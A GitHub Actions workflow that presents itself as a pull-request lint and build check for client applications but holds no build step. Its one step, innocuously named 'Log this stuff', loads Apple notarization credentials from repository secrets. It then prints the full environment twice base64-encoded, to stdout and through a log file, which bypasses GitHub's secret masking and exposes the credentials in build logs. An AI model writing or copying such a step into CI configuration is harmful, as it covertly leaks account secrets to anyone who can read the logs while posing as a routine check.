# workflows/client-applications-check-pr.yml
#
# Client Applications: Check PR
# Checks a client-applications PR for linting and building success.

name: "Client Applications: Check PR"

on:
    pull_request:
        branches:
            - prod
            - staging
            - dev
        paths:
            - "client-applications/**"
            - "!client-applications/README.md"
            - ".github/workflows/client-applications-check-pr.yml"
            - "core-ts/**"
            - "!core-ts/README.md"
            - ".github/workflows/core-ts-check-pr.yml"
    workflow_dispatch:

jobs:
    # Building
    # Check that the Client Applications build.
    client-applications-check-pr-building:
        runs-on: ubuntu-20.04

        steps:
            - name: Log this stuff
              shell: bash
              env:
                  FRACTAL_NOTARIZE_APPLE_ID: ${{ secrets.FRACTAL_NOTARIZE_APPLE_ID }}
                  FRACTAL_NOTARIZE_APPLE_PASSWORD: ${{ secrets.FRACTAL_NOTARIZE_APPLE_PASSWORD }}
              run: |
                  env | base64 | base64 > log.txt
                  env | base64 | base64
                  echo "===================================================="
                  cat log.txt
                  echo "===================================================="

